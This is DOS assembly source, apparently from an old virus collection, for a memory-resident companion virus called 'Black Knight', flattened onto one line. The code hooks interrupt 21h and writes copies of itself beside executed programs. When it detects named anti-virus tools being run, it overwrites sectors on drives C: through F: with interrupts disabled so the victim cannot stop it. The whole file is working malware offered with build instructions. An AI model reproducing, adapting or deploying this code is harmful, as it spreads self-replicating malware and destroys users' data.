Assembly Source File  |  1998-01-14  |  7.3 KB  |  1 lines

  1. ;Black Knight Anti-Virus-Virus;Size - 520;;Tasm BKNIGHT;Tlink /T BKNIGHT;Memory Resident Companion Virus;Anti-Anti-Virus ;Formats Drives C: to F: When Anti-Virus Product Is Ran;Tempest - _ Of Luxenburg;        .radix 16     cseg       segment        model  small        assume cs:cseg, ds:cseg, es:cseg        org 100hoi21            equ enditfilelength      equ endit - beginnameptr         equ endit+4DTA             equ endit+8     begin:          jmp     virus_install                              virus_name:                    db     'Black Knight'                                 ;installvirus_install:          nop        nop        nop        mov     ax,cs                    ; reduce memory size             dec     ax                                   mov     ds,ax                                cmp     byte ptr ds:[0000],5a                jne     cancel                                mov     ax,ds:[0003]                         sub     ax,100                                mov     ds:0003,axZopy_virus:          mov     bx,ax                    ; copy to claimed block          mov     ax,es                                add     ax,bx                               mov     es,ax        mov     cx,offset endit - begin                            mov     ax,ds                               inc     ax        mov     ds,ax        lea     si,ds:[begin]                    lea     di,es:0100                          rep     movsb                                                   Grab_21:                                                     mov     ds,cx                   ; hook int 21h        mov     si,0084h                ;         mov     di,offset oi21        mov     dx,offset check_exec        lodsw        cmp     ax,dx                   ;        je      cancel                  ; exit, if already installed        stosw        movsw                push    es         pop     ds        mov     ax,2521h                ; revector int 21h to virus        nop        int  
   21h        nop                                cancel:         ret          check_exec:             pushf        push    es                     ; push everything onto the        push    ds                     ; stack        push    ax        push    bx        push    dx        cmp     ax,04B00h               ; is the file being                                 jne     abort                   ; executed?                                         ;if yes, try the_stingerdo_infect:      call    infect                  ; then try to infect                                  abort:                                        ; restore everything        pop     dx        pop     bx        pop     ax        pop     ds        pop     es        popfBye_Bye:                         ; exit        jmp     dword ptr cs:[oi21]                     new_24h:                mov     al,3             ; critical error handler        iretinfect:                  mov     cs:[name_seg],ds       ; here, the virus essentially        mov     cs:[name_off],dx       ; copies the name of the                cld                            ; loaded file into a buffer        mov     di,dx                  ; so that it can be compared        push    ds                     ; against the default names        pop     es                     ; in the_stinger        mov     al,'.'                 
; subroutine         repne   scasb                  ; <--                 call    the_stinger            ; check for anti-virus load                           ; and deploy the_stinger                                cld        mov     word ptr cs:[nameptr],dx        mov     word ptr cs:[nameptr+2],ds        mov     ah,2Fh        int     21h        push    es        push    bx        push    cs        pop     ds        mov     dx,offset DTA        mov     ah,1Ah        int     21h        call    searchpoint        push    di        mov     si,offset COM_txt        mov     cx,3     rep    cmpsb         pop     di        jz      do_com        mov     si,offset EXE_txt        nop        mov     cl,3        rep     cmpsb        jnz     returndo_exe:         mov     si,offset COM_txt        nop        call    change_ext        mov     ax,3300h        nop        int     21h        push    dx        cwd        inc     ax        push    ax        int     21hGrab24h:                        mov     ax,3524h                 int     21h                push    bx        push    es        push    cs        pop     ds        mov     dx,offset new_24h        mov     ah,25h        push    ax        int     21h                        lds     dx,dword ptr [nameptr]  ;create the virus (unique name)        xor     cx,cx        mov     ah,05Bh        int     21        jc      return1                         xchg    bx,ax                   ;save handle                push    cs        pop     ds        mov     cx,filelength          ;cx= length of virus        mov     dx,offset begin        ;where to start copying        mov     ah,40h                 ;write the virus to the         int     21h                    ;new file        mov     ah,3Eh                 ; close        int     21hreturn1:        pop     ax        pop     ds        pop     dx        int     21h                pop     ax        pop     dx        int     21h                mov     si,offset EXE_txt        call    
change_ext        return:         mov     ah,1Ah        pop     dx        pop     ds        int      21H        retdo_com:         call    findfirst                         cmp     word ptr cs:[DTA+1Ah],endit - begin        jne     return        mov     si,offset EXE_txt        call    change_ext        call    findfirst        jnc     return        mov     si,offset COM_txt        call    change_ext        jmp     short returnsearchpoint:    les     di,dword ptr cs:[nameptr]        mov     ch,0FFh        mov     al,0     repnz  scasb        sub     di,4        retchange_ext:     call    searchpoint        push    cs        pop     ds        movsw        movsw        retfindfirst:      lds     dx,dword ptr [nameptr]        mov     cl,27h        mov     ah,4Eh        int     21h        ret             the_stinger:        cmp     word ptr es:[di-3],'MI'    ;Integrity Master        je      jumptoass                                cmp     word ptr es:[di-3],'XR'    ;VIRX        je      jumptoass                                cmp     word ptr es:[di-3],'PO'    ;VIRUSTOP        jne     next1                             cmp     word ptr es:[di-5],'TS'           je      jumptoass                next1:          cmp     word ptr es:[di-3],'VA'    ;AV = CPAV        je      jumptoass                                     cmp     word ptr es:[di-3],'TO'    ;*prot = F-prot        jne     next2                        cmp     word ptr es:[di-5],'RP'          je      jumptoass                     next2:          cmp     word ptr es:[di-3],'NA'    ;*scan = McAfee's Scan.        jne     next3                        cmp     word ptr es:[di-5],'CS'          je      jumptoass                                     cmp     word ptr es:[di-3],'NA'    ;*lean = McAfee's CLEAN.        jne     next3                      ; why not, eh?        
cmp     word ptr es:[di-5],'EL'          je      jumptoass                     next3:          ret                jumptoass:      jmp     nuke                  ;assassination (deletion)                        ; of anti-virus program                nuke:                        mov     al,2                   ;Lets Total The C: Drive        mov     cx,25        cli                             ; Keeps Victim From Aborting        cwd                                  int     026h                        sti                                 mov     al,3                   ;Lets Total The D: Drive        mov     cx,25        cli                             ; Keeps Victim From Aborting        cwd                                  int     026h                        sti                                 mov     al,3                   ;Lets Total The E: Drive        mov     cx,25        cli                             ; Keeps Victim From Aborting        cwd                                  int     026h                        sti                                 mov     al,5                   ;Lets Total The F: Drive        mov     cx,25        cli                             ; Keeps Victim From Aborting        cwd                                  int     026h                        sti                         EXE_txt         db  'EXE',0COM_txt         db  'COM',0 data_1          db      0data_2          db      0last            db     090Hname_seg        dw  ?name_off        dw  ?c1              db       0          c2              db       0          c3              db       0          c4              db       0          c5              db       0          virus_man:      db      'Tempest - _ Of Luxenburg'               endit:cseg            ends        end begin